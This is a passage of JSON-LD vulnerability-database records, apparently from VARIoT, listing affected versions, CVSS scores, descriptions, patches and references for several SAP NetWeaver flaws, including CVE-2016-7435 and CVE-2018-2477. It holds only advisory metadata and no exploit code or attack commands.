"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:34:24.903000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2260344",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
},
{
"title": "SAP Netweaver Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=64539"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005170"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-113"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005170"
},
{
"db": "NVD",
"id": "CVE-2016-7435"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "http://seclists.org/fulldisclosure/2016/oct/2"
},
{
"trust": 2.7,
"url": "http://seclists.org/fulldisclosure/2016/oct/0"
},
{
"trust": 2.7,
"url": "http://seclists.org/fulldisclosure/2016/oct/1"
},
{
"trust": 2.4,
"url": "https://www.onapsis.com/blog/analyzing-sap-security-notes-march-2016"
},
{
"trust": 1.7,
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctctmsmaintainalog"
},
{
"trust": 1.6,
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshcheckenv"
},
{
"trust": 1.6,
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshexporttabcomp"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/93272"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-7435"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-7435"
},
{
"trust": 0.6,
"url": "https://www.onapsis.com,"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-7435"
},
{
"trust": 0.6,
"url": "http://packetstormsecurity.com/files/138952/sap-netweaver-7.40-sp-12-sctc_tms_maintain_alog-command-injection.html"
},
{
"trust": 0.6,
"url": "http://packetstormsecurity.com/files/138951/sap-netweaver-7.40-sp-12-sctc_refresh_check_env-command-injection.html"
},
{
"trust": 0.6,
"url": "http://packetstormsecurity.com/files/138950/sap-netweaver-7.40-sp-12-sctc_refresh_export_tab_comp-command-injection.html"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2016/oct/50"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2260344"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2016/oct/30"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2016/oct/28"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2016/oct/51"
},
{
"trust": 0.2,
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-preparecheckcapacity"
},
{
"trust": 0.1,
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshconfigctc"
},
{
"trust": 0.1,
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcrefreshimportusrclnt-i"
},
{
"trust": 0.1,
"url": "https://www.onapsis.com/research/security-advisories/sap-os-command-injection-sctcreorgspool"
}
],
"sources": [
{
"db": "BID",
"id": "93272"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005170"
},
{
"db": "PACKETSTORM",
"id": "139095"
},
{
"db": "PACKETSTORM",
"id": "139088"
},
{
"db": "PACKETSTORM",
"id": "139085"
},
{
"db": "PACKETSTORM",
"id": "139083"
},
{
"db": "PACKETSTORM",
"id": "139092"
},
{
"db": "PACKETSTORM",
"id": "139084"
},
{
"db": "NVD",
"id": "CVE-2016-7435"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-113"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "93272"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005170"
},
{
"db": "PACKETSTORM",
"id": "139095"
},
{
"db": "PACKETSTORM",
"id": "139088"
},
{
"db": "PACKETSTORM",
"id": "139085"
},
{
"db": "PACKETSTORM",
"id": "139083"
},
{
"db": "PACKETSTORM",
"id": "139092"
},
{
"db": "PACKETSTORM",
"id": "139084"
},
{
"db": "NVD",
"id": "CVE-2016-7435"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-113"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-10-03T00:00:00",
"db": "BID",
"id": "93272"
},
{
"date": "2016-10-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-005170"
},
{
"date": "2016-10-12T16:04:08",
"db": "PACKETSTORM",
"id": "139095"
},
{
"date": "2016-10-11T19:32:22",
"db": "PACKETSTORM",
"id": "139088"
},
{
"date": "2016-10-11T18:32:22",
"db": "PACKETSTORM",
"id": "139085"
},
{
"date": "2016-10-11T14:43:33",
"db": "PACKETSTORM",
"id": "139083"
},
{
"date": "2016-10-11T23:22:22",
"db": "PACKETSTORM",
"id": "139092"
},
{
"date": "2016-10-11T16:22:22",
"db": "PACKETSTORM",
"id": "139084"
},
{
"date": "2016-10-05T16:59:06.807000",
"db": "NVD",
"id": "CVE-2016-7435"
},
{
"date": "2016-10-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201610-113"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-10-26T00:04:00",
"db": "BID",
"id": "93272"
},
{
"date": "2016-10-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-005170"
},
{
"date": "2016-11-28T20:39:15.077000",
"db": "NVD",
"id": "CVE-2016-7435"
},
{
"date": "2016-10-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201610-113"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201610-113"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver of SCTC Vulnerability to execute arbitrary commands in multiple functions of subpackage",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005170"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201610-113"
}
],
"trust": 0.6
}
}
var-201811-0445
Vulnerability from variot
Knowledge Management (XMLForms) in SAP NetWeaver, versions 7.30, 7.31, 7.40 and 7.50 does not sufficiently validate an XML document accepted from an untrusted source. SAP NetWeaver The blinds XPath An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Attackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201811-0445",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.1,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.1,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.1,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 2.1,
"vendor": "sap",
"version": "7.30"
},
{
"model": "knowledge management",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "105901"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014196"
},
{
"db": "NVD",
"id": "CVE-2018-2477"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2477"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP",
"sources": [
{
"db": "BID",
"id": "105901"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-401"
}
],
"trust": 0.9
},
"cve": "CVE-2018-2477",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-2477",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-2477",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-2477",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201811-401",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-014196"
},
{
"db": "NVD",
"id": "CVE-2018-2477"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-401"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Knowledge Management (XMLForms) in SAP NetWeaver, versions 7.30, 7.31, 7.40 and 7.50 does not sufficiently validate an XML document accepted from an untrusted source. SAP NetWeaver The blinds XPath An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. \nAttackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2477"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014196"
},
{
"db": "BID",
"id": "105901"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-2477",
"trust": 2.7
},
{
"db": "BID",
"id": "105901",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014196",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201811-401",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "105901"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014196"
},
{
"db": "NVD",
"id": "CVE-2018-2477"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-401"
}
]
},
"id": "VAR-201811-0445",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T14:05:18.114000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day - November 2018",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=503809832"
},
{
"title": "SAP NetWeaver Knowledge Management (XMLForms) Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=86811"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-014196"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-401"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-91",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-014196"
},
{
"db": "NVD",
"id": "CVE-2018-2477"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://launchpad.support.sap.com/#/notes/2661740"
},
{
"trust": 1.9,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=503809832"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/105901"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-2477"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-2477"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
}
],
"sources": [
{
"db": "BID",
"id": "105901"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014196"
},
{
"db": "NVD",
"id": "CVE-2018-2477"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-401"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "105901"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014196"
},
{
"db": "NVD",
"id": "CVE-2018-2477"
},
{
"db": "CNNVD",
"id": "CNNVD-201811-401"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-11-13T00:00:00",
"db": "BID",
"id": "105901"
},
{
"date": "2019-03-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-014196"
},
{
"date": "2018-11-13T20:29:00.420000",
"db": "NVD",
"id": "CVE-2018-2477"
},
{
"date": "2018-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201811-401"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-11-13T00:00:00",
"db": "BID",
"id": "105901"
},
{
"date": "2019-03-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-014196"
},
{
"date": "2019-02-01T15:44:52.713000",
"db": "NVD",
"id": "CVE-2018-2477"
},
{
"date": "2019-02-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201811-401"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201811-401"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Blind in XPath Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-014196"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201811-401"
}
],
"trust": 0.6
}
}
var-201106-0299
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is an unspecified error in the SLD (System Landscape Directory), and version information can be obtained through the /REP and /RWB directories
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201106-0299",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.x"
}
],
"sources": [
{
"db": "IVD",
"id": "c34e4b78-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2385"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "c34e4b78-1f91-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "c34e4b78-1f91-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "c34e4b78-1f91-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There is an unspecified error in the SLD (System Landscape Directory), and version information can be obtained through the /REP and /RWB directories",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2385"
},
{
"db": "IVD",
"id": "c34e4b78-1f91-11e6-abef-000c29c66e3d"
}
],
"trust": 0.72
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2011-2385",
"trust": 0.8
},
{
"db": "IVD",
"id": "C34E4B78-1F91-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "c34e4b78-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2385"
}
]
},
"id": "VAR-201106-0299",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "c34e4b78-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2385"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "c34e4b78-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2385"
}
]
},
"last_update_date": "2022-05-17T02:02:39.791000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeave has an unexplained patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/4225"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2385"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=323"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2385"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "c34e4b78-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2385"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-06-22T00:00:00",
"db": "IVD",
"id": "c34e4b78-1f91-11e6-abef-000c29c66e3d"
},
{
"date": "2011-06-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2385"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-06-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2385"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeave has an unknown vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2385"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
